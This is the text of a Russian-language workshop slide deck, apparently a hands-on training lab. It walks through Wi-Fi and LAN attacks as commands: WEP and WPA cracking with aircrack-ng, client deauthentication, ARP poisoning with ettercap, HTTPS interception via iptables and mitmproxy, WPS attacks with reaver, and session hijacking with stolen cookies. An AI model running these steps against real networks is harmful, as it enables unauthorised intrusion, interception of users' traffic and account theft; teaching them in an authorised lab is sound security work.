Get inside stage2 new
•Download as PPTX, PDF•
0 likes•266 views
Воркшоп Get_Inside
Report
Share
Get inside stage2 new
- 1. Get_Inside Дмитрий Мирошниченко ЗАО «Перспективный мониторинг»
- 9. Немного теории WEP (wired equivalent privacy) Недостатки: коллизии IV. Для атаки на WEP необходимо несколько 10К кадров с IV.
- 10. Подготовка интерфейса iwconfig – перечень wi-fi интерфейсов service network-manager stop - остановка посторонних сервисов airmon-ng start <интерфейс> - создание виртуального promiscous интерфейса.
- 11. Подготовка интерфейса airodump-ng mon0 – проверка работоспособности интерфейса, поиск целевой АП.
- 12. Ломаем WEP airodump-ng -w <имя_файла> --bssid <bssid> -c <канал> mon0 - запись траффика с векторами инициализации. aircrack-ng <cap._файл> - ломаем ключ WEP
- 13. ARP протокол
- 14. Ломаем WEP aireplay-ng --arpreplay -b <bssid> mon0 - arp-replay атака. aireplay-ng --deauth 1 -a <BSSID> mon0 деаутентификация клиента для получения arp пакета
- 15. 802.11 аутентификация aireplay-ng --fakeauth 10 -a <bssid> mon0 - аутентификация с ТД.
- 16. Ломаем WEP aireplay-ng --arpreplay -b <bssid> -x 20 mon0 - arp-replay атака, с ограничением 20 пакетов в секунду.
- 18. Wireshark, анализ трафика iwconfig <interface> channel <channel> - настройка интерфейса на прослушивание на определенном канале Capture->Interfaces->mon0->Start - анализ трафика на интерфейсе mon0
- 19. Wireshark, анализ трафика wlan.bssid == <bssid> - фильтр отображения по bssid Edit->Preferences->Protocols- >IEEE_802.11->Edit->New-><wep key> - настройка дешифрования трафика
- 21. Wireshark, анализ трафика http - фильтр отображения http пакетов. follow tcp stream - сбор TCP сессии
- 22. HTTP сессия
- 23. Угон сессии Устанавливаем в браузер перехваченный токен сессии (Firefox - “Cookie manager”. Chromium - “Edit this cookie”). PROFIT!
- 25. Сканирование ifconfig - список сетевых интерфейсов с присвоенными ip адресами nmap -sn <диапазон адресов> - поиск активных хостов в диапазоне адресов
- 28. ARP poisoning echo 1 > /proc/sys/net/ipv4/ip_forward - включаем форвардинг пакетов ettercap -T -M arp -o -i wlan1 /<target1_ip>/ /<target2_ip>/ - митм трафика между целевыми хостами
- 30. Wireshark, анализ трафика iwconfig <interface> channel <channel> - настройка интерфейса на прослушивание на определенном канале. Capture->Interfaces->wlan1>Start - анализ трафика на интерфейсе wlan1
- 33. Вскрываем HTTPS by Ettercap nano /etc/ettercap/etter.conf - редактируем файл конфигурации ettercap -T -M arp -i wlan1 /<target1_ip>/ /<target2_ip>/ - перехват и просмотр траффика
- 34. Вскрываем HTTPS by mitmproxy echo 1 > /proc/sys/net/ipv4/ip_forward - включаем форвардинг пакетов iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 80 -j REDIRECT --to-port 8080
- 35. Вскрываем HTTPS iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 443 -j REDIRECT --to-port 8080 ettercap -T -M arp -o -i wlan1 /<target1_ip>/ /<target2_ip>/ - митм трафика между целевыми хостами mitmproxy -T - запускаем mitmproxy
- 36. Установка mitmproxy apt-get install python-pip apt-get install libxml2-dev apt-get install libxslt-dev pip install --upgrade six pip install mitmproxy pip install --upgrade mitmproxy.
- 37. Для тех, кому не хватило Ломаем WPS wash -i mon0 - список ТД поддерживающих WPS reaver -i mon0 -b <ap_bssid> - взлом ТД по WPS
- 38. Немного теории WPA2 (wi-fi protected access 2): 4-way handshake
- 39. Немного теории Взлом WPA/WPA2 перебором
- 40. Ломаем WPA airodump-ng -w <имя_файла> --bssid <bssid> -c <канал> mon0 - запись траффика с хендшейком. aireplay-ng --deauth 1 -a <BSSID> mon0 деаутентификация клиента для получения 4-way handshake
- 41. Ломаем WPA /usr/share/wordlists/rockyou.txt.gz - расположение словаря gzip -d /usr/share/wordlists/rockyou.txt.gz - распаковка словаря aircrack-ng <.cap_файл> -w <файл_словарь> - взлом хендшейка по словарю
- 42. Спасибо за внимание! Дмитрий Мирошниченко ЗАО «Перспективный мониторинг»